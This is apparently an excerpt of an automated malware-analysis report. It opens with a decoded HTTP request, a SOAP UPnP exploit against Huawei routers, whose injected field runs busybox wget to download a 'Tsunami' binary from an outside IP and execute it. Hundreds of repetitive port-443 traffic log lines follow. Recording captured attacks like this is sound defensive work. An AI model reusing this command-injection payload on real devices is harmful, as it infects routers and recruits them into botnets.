3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 33 37 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.37.59 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47324
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50976
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47564
    Source: unknownNetwork traffic detected: HTTP traffic on port 47556 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59308
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38612
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58218
    Source: unknownNetwork traffic detected: HTTP traffic on port 41138 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47350 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33162
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47556
    Source: unknownNetwork traffic detected: HTTP traffic on port 38116 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42190 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 36898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45130
    Source: unknownNetwork traffic detected: HTTP traffic on port 33036 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52920
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38842
    Source: unknownNetwork traffic detected: HTTP traffic on port 55818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36898
    Source: unknownNetwork traffic detected: HTTP traffic on port 45684 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44032
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46450
    Source: unknownNetwork traffic detected: HTTP traffic on port 52920 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60552
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39914
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38824
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36406
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58482
    Source: unknownNetwork traffic detected: HTTP traffic on port 59642 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 36590 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48624
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48866
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46688
    Source: unknownNetwork traffic detected: HTTP traffic on port 42270 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34460
    Source: unknownNetwork traffic detected: HTTP traffic on port 45948 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 46758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58012
    Source: unknownNetwork traffic detected: HTTP traffic on port 59848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 37112 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39028 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 33736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45204 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54148 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44590 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 46450 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36228
    Source: unknownNetwork traffic detected: HTTP traffic on port 36762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56480
    Source: unknownNetwork traffic detected: HTTP traffic on port 55714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51160 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 46688 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54048 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 59000 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59482 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45178
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45172
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47350
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58424
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55158
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39966
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39724
    Source: unknownNetwork traffic detected: HTTP traffic on port 53120 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57586
    Source: unknownNetwork traffic detected: HTTP traffic on port 39578 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49198 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56490
    Source: unknownNetwork traffic detected: HTTP traffic on port 55648 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60500
    Source: unknownNetwork traffic detected: HTTP traffic on port 56526 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 34624 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39960
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36696
    Source: unknownNetwork traffic detected: HTTP traffic on port 52324 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 37640 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59526
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59532
    Source: unknownNetwork traffic detected: HTTP traffic on port 40326 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40702
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35122
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54082
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34032
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54088
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33182
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60758
    Source: unknownNetwork traffic detected: HTTP traffic on port 42612 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43150 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49514
    Source: unknownNetwork traffic detected: HTTP traffic on port 32786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49268 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46002
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51816
    Source: unknownNetwork traffic detected: HTTP traffic on port 58762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51638 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 40740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45390
    Source: unknownNetwork traffic detected: HTTP traffic on port 44336 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38856
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38614
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57364
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59780
    Source: unknownNetwork traffic detected: HTTP traffic on port 58134 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53136 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 41012 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32908
    Source: unknownNetwork traffic detected: HTTP traffic on port 37934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46074
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39780
    Source: unknownNetwork traffic detected: HTTP traffic on port 41828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51150 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50332
    Source: unknownNetwork traffic detected: HTTP traffic on port 58796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40526
    Source: unknownNetwork traffic detected: HTTP traffic on port 40142 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58060
    Source: unknownNetwork traffic detected: HTTP traffic on port 57264 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49332
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50340
    Source: unknownNetwork traffic detected: HTTP traffic on port 40572 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37112
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37598
    Source: unknownNetwork traffic detected: HTTP traffic on port 56976 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35176
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42934
    Source: unknownNetwork traffic detected: HTTP traffic on port 45956 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54118 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43082 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40996
    Source: unknownNetwork traffic detected: HTTP traffic on port 43862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37102
    Source: unknownNetwork traffic detected: HTTP traffic on port 43140 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
    Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60398
    Source: unknownNetwork traffic detected: HTTP traffic on port 45572 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40986
    Source: unknownNetwork traffic detected: HTTP traffic on port 32796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47432 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48228
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55818
    Source: unknownNetwork traffic detected: HTTP traffic on port 44946 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51384 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36004
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51697
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34068
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
    Source: unknownNetwork traffic detected: HTTP traffic on port 55128 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50340 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 35808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 35176 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48056
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
    Source: unknownNetwork traffic detected: HTTP traffic on port 58218 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45130 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51620
    Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44956 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58268
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40326
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56086
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44926
    Source: unknownNetwork traffic detected: HTTP traffic on port 56894 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 35050 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54696 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58260
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40566
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40564
    Source: unknownNetwork traffic detected: HTTP traffic on port 38026 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50788
    Source: unknownNetwork traffic detected: HTTP traffic on port 54392 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49134
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51638
    Source: unknownNetwork traffic detected: HTTP traffic on port 48336 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39576
    Source: unknownNetwork traffic detected: HTTP traffic on port 37664 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39578
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
    Source: unknownNetwork traffic detected: HTTP traffic on port 46002 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57182
    Source: unknownNetwork traffic detected: HTTP traffic on port 59532 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 32898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41640
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40554
    Source: unknownNetwork traffic detected: HTTP traffic on port 35094 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51408
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46092
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37386
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52974
    Source: unknownNetwork traffic detected: HTTP traffic on port 34704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42966
    Source: unknownNetwork traffic detected: HTTP traffic on port 46372 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57182 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51514 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51898
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48268
    Source: unknownNetwork traffic detected: HTTP traffic on port 38758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51697 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46084
    Source: unknownNetwork traffic detected: HTTP traffic on port 42362 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45630 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43130 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40770
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42954
    Source: unknownNetwork traffic detected: HTTP traffic on port 41572 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60128
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42670
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
    Source: unknownNetwork traffic detected: HTTP traffic on port 32804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51384
    Source: unknownNetwork traffic detected: HTTP traffic on port 44032 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39028
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33710
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55740
    Source: unknownNetwork traffic detected: HTTP traffic on port 38856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54660
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41572
    Source: unknownNetwork traffic detected: HTTP traffic on port 43590 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49480 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48624 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55516
    Source: unknownNetwork traffic detected: HTTP traffic on port 37886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54660 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
    Source: unknownNetwork traffic detected: HTTP traffic on port 46626 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 40644 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48268 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42332 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42410
    Source: unknownNetwork traffic detected: HTTP traffic on port 39414 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44926 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 40724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55530
    Source: unknownNetwork traffic detected: HTTP traffic on port 49514 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48978 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53114
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49272
    Source: unknownNetwork traffic detected: HTTP traffic on port 44720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52868 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53120
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53362
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42638
    Source: unknownNetwork traffic detected: HTTP traffic on port 51232 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 37930 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 32988 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45982
    Source: unknownNetwork traffic detected: HTTP traffic on port 45772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57982 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58012 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55942
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53520
    Source: unknownNetwork traffic detected: HTTP traffic on port 42342 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51590
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47914
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41138
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40044
    Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 60742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39050
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53532
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32898
    Source: unknownNetwork traffic detected: HTTP traffic on port 44870 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55950
    Source: unknownNetwork traffic detected: HTTP traffic on port 55950 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38992 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54870
    Source: unknownNetwork traffic detected: HTTP traffic on port 34664 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47902
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44870
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34822
    Source: unknownNetwork traffic detected: HTTP traffic on port 55158 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45956
    Source: unknownNetwork traffic detected: HTTP traffic on port 53114 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43534
    Source: unknownNetwork traffic detected: HTTP traffic on port 54130 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42606 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 36696 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45948
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43766
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44854
    Source: unknownNetwork traffic detected: HTTP traffic on port 44710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40016
    Source: unknownNetwork traffic detected: HTTP traffic on port 52974 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42270
    Source: unknownNetwork traffic detected: HTTP traffic on port 35650 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57528
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58614
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34650
    Source: unknownNetwork traffic detected: HTTP traffic on port 54296 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54250 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48506 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47914 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47956
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46626
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45538
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45772
    Source: unknownNetwork traffic detected: HTTP traffic on port 59864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39098
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43590
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34876
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59714
    Source: unknownNetwork traffic detected: HTTP traffic on port 53532 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47902 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50878 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47072 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44674
    Source: unknownNetwork traffic detected: HTTP traffic on port 38824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42250
    Source: unknownNetwork traffic detected: HTTP traffic on port 41486 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34628
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55128
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59968
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34624
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34862
    Source: unknownNetwork traffic detected: HTTP traffic on port 51510 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 33102 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46608
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47936
    Source: unknownNetwork traffic detected: HTTP traffic on port 36598 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59308 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 36856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55530 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50922
    Source: unknownNetwork traffic detected: HTTP traffic on port 58888 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50924
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58648
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54048
    Source: unknownNetwork traffic detected: HTTP traffic on port 46084 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 33252 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58888
    Source: unknownNetwork traffic detected: HTTP traffic on port 58424 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39960 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42638 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54296
    Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43326
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44414
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40298
    Source: unknownNetwork traffic detected: HTTP traffic on port 53520 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47936 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47922
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45502
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44412
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47520
    Source: unknownNetwork traffic detected: HTTP traffic on port 37598 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54696
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53122
    Source: unknownNetwork traffic detected: HTTP traffic on port 45096 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49332 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 40892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37962
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36628
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38806
    Source: unknownNetwork traffic detected: HTTP traffic on port 35230 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45572
